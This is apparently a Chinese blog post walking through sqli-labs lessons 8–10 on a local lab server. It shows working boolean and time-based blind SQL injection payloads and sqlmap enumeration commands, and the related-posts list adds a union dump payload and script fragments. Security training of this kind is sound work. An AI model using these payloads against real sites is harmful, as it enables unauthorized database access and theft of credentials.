sqli-lab平台注入练习 八,九,十

最新推荐文章于 2022-03-16 15:20:34 发布
最新推荐文章于 2022-03-16 15:20:34 发布
阅读量176 收藏
点赞数
分类专栏: Web安全sqli-lab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chuxuezheerer/article/details/102235159
版权

今天的内容主要都是回顾第五次练习里的内容。虽然没过几天,突然发现自己要注入还需要回顾前面的…

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

首先进行常规测试,发现单引号不能正常回显,双引号可以使页面正常回显,所以判断要用布尔型的盲注了吧。
在这里插入图片描述
之后同第五关,利用布尔型进行注入,再复习一下吧
猜测数据库名字的长度:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())=8 --+

猜测数据库的名字:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select database()),8)='security' --+

猜测数据表的名字

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+

猜测数据表中字段名字:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 1,1),8)='username' --+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 2,1),8)='password' --+

慢慢慢慢的爆破字段中的内容:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and left((select username from users order by id limit 0,1),1)='d' --+

之后用SQLMap再跑一遍:

查询所有的库名:

C:\Python27\sqlmapproject-sqlmap-c8a4e63>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-8/?id=1" --dbs

列出表:

C:\Python27\sqlmapproject-sqlmap-c8a4e63>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-8/?id=1" -D security --tables

列出字段:

C:\Python27\sqlmapproject-sqlmap-c8a4e63>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-8/?id=1" -D security -T users --columns

列出字段内容:

C:\Python27\sqlmapproject-sqlmap-c8a4e63>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-8/?id=1" -D security -T users --columns

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

首先发现无论输入什么,网页显示都是一样的,说明可能会利用时间回显的盲注。
利用时间回显来判断语句正确性

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(3) --+

发现有很明显的延迟:
在这里插入图片描述
之后按常规注入,再过一遍:

判断数据库长度,会看到长度为8时会有很明显的延迟:

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(length(database())=8,sleep(5),1) --+

判断数据库的名字:

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left(database(),8)='security',sleep(5),1) --+

判断数据库中表的名字:

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),1) --+

判断数据表中列的名字:

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 1,1),8)='username',sleep(5),1) --+

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 2,1),8)='password',sleep(5),1) --+

再慢慢慢慢判断列中的具体内容(一下仅列举了一个):

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb',sleep(5),1) --+

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

开始还是常规尝试,发现无论输入什么,页面还是一样的,所以想着这应该又应用的是基于时间的盲注
尝试,发现这种情况下有明显的延迟。
在这里插入图片描述
后续步骤同上

chuxuezheerer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-8 Blind-- Boolian Based基于布尔的盲注
bigblue00的博客
06-16 408
Less-8 Blind-- Boolian Based基于布尔的盲注 1、回显分析 当输入的语句正确时,显示 You are in… 当输入的语句异常时,不显示任何信息 2、SQL盲注 根据页面的显示情况会有不同,可以构造判断语句,当语句成立时,显示You are in… 当语句不成立时,不显示任何信息。 先判断数据库名的长度: http://192.168.195.110/sqli-labs/Less-8/?id=1’and (length(database())>10) – + 页面无信息显示,
sqli-lab注入练习源码
06-25
本套源码是sqli-lab练习sql再好不过,将源码用phpstudy搭建即可开始练习
sql注入练习之——sqli-labs 1-25
wsnbbz的博客
02-10 3019
第一关: 注入点:‘连接的字符串 数据脱库: -1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3-- - 第二关: 注入点:数值型 数据脱库: -1 union select 1,(select group_concat(concat_ws(0x7e,username,...
小白入门SQL注入基础-基于Sqli-lab平台实战
DYBOY-程序开发&网络安全
06-08 4175
简介:SQL注入是一个常见的漏洞,在所有的安全防护统计数据儿结果中显示,SQL注入几乎占据网络攻击问题的60%左右,由此可见SQL注入漏洞是一种常见的WEB漏洞,了解SQL注入对于网络安全工作者或安全爱好者来说,是非常有必要,本文章主要通过sqli平台来具体阐述SQL注入漏洞产生的原因和利用方法。 0x00 SQL注入漏洞简介 有关SQL注入的各种定义阐述已经很多,大家可自行使用搜索引...
sqli-labs练习)------GET-Blind-Boolian Based-Sing Quotes
wkend的博客
04-26 547
输入1,回显You are in........... 输入1',没有回显 sql基于布尔的盲注 相关函数 函数 作用 length(str) 返回字符串str的长度 substr(str, pos, len) 将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始 mid(s...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
SQLi-Lab:每个SQL注入实验室
03-29
SQLi-Lab是一个专门用于学习和练习SQL注入技术的平台,对于理解和防范这种攻击非常有帮助。 在"SQLi-Lab:每个SQL注入实验室"中,你可以期待以下的知识点: 1. **SQL注入基础**:了解SQL注入的基本原理,包括如何...
sqli-lab操作详解
07-12
`sqli-lab`是一个用于学习和实践SQL注入的在线平台,它模拟了多种类型的SQL注入漏洞,帮助用户了解并掌握SQL注入的攻防技巧。通过完成`sqli-lab`的各个挑战,你可以深入理解不同类型的SQL注入,如基于错误的注入、...
windows环境下安装sqli-labs
11-04
然后,我们可以开始我们的 SQL 注入练习。 结语 在这里,我们已经成功安装了 sqli-labs。在 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。我们需要准备好 Apache、PHP、MySQL 和 ...
SQL injection-Boolian Based
weixin_46601529的博客
09-23 100
猜解数据库长度 url?id=1' and length(database())>10 %23 #length() 获取字符串长度 2.猜解数据库名 url?id=1 and ascii(substr(database(),1,1))>96 %23 #ascii码 #substr(string,start,length) 48-57 0-9 65-90 A-Z 97-122 a-z 3.编写脚本刷出数据库名 security import requests .
sqli-labs less8 Get -Blind -Boolian based -Single quotes
Monster1m的博客
01-02 206
一、输入id,页面正常 http://127.0.0.1/sqli-labs-master/Less-8/?id=1 二、判断闭合方式以及注入方式 1.添加单引号,显示错误页面且无报错信息 http://127.0.0.1/sqli-labs-master/Less-8/?id=1' 2.添加注释符,页面正常显示,则闭合方式为单引号 http://127.0.0.1/sqli-labs-master/Less-8/?id=1'--+ 3.由于没显示错误信息,所以选择盲注,这关提示用布尔盲注 三、判断
SQL注入练习平台sqli-labs
热门推荐
海枫的专栏
11-04 1万+
你是否在学习SQL注入找不到好的OJ平台,这里介绍sqli-labs项目给你,非常适合SQL注入初学者来这里升级怪兽。
sqli中盲注使用python脚本快速爆破
公众号:乌云安全
03-16 1251
#!/usr/bin/python3 # coding: utf-8 import requests url = "http://10.10.1.71/Less-15/" password_data = "" ascii_list = range(32, 128) j = 0 num = 0 # str1 = "You are in" # str2 = "You have an error in your SQL syntax" while(True): j += 1 arr = as.
sql 布尔盲注 python脚本实现
sophia9301的博客
10-12 7685
渣渣一枚,把学习sql注入过程中遇到的一些问题记录下来,以供日后参考。 按照网上教程注入时发现过滤了union = < > ,顿时就一脸懵逼,因为不会构造sql语句,更不会绕过,最后在师父的指导下,首先通过手工注入注入出了数据库名及长度。 1.数据库名长度: http://XXX.XXX.XX/sql.php? id=345’ and length(database()) like 1 an
这是对付sqli-labs less5 的盲注python脚本(不懂,写了好久)
qq_45106794的博客
10-29 795
import requests db_length=1 db_url='' db_place=1 db_name='' db_ascii=1 print("猜解数据库长度") url="http://192.168.56.101/sqli-labs-master/less-5/?id=1'" for db_length in range(1,100): db_url=url+'and %d...
Sqli-labs6-10 盲注、基于时间,基于报错(附脚本)
Recar的博客
12-13 2671
第六题 双引号双注入和第五题一样的界面单引号,不报错,使用双引号 报错http://localhost/sqli-labs/Less-6/?id=-1"; union select 1 from(select count(*),concat_ws(':',(select version()),floor(rand(0)*2))a from information_schema.tables gro
git教程【源码管理系统教程及版本管理功能教程】
08-13
git是一种源码管理系统(source code management,缩写为SCM)。它对当前文件提供版本管理功能,核心思想是对当前文件建立一个对象数据库(object database),将历史版本信息存放在这个数据库中。 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
财务收入支出系统
最新发布
08-13
工资表,财务报表,对账表,付款申请,财务报告,费用支出表,财务收支 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
sql注入sqli-lab
07-28
Sqli-lab是一个用于学习和实践SQL注入的实验环境。 在Sqli-lab中,你可以使用各种技术和工具来进行SQL注入攻击,并学习如何修复和防止这类漏洞。这个实验环境提供了一系列具有不同难度级别的注入场景,你可以尝试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值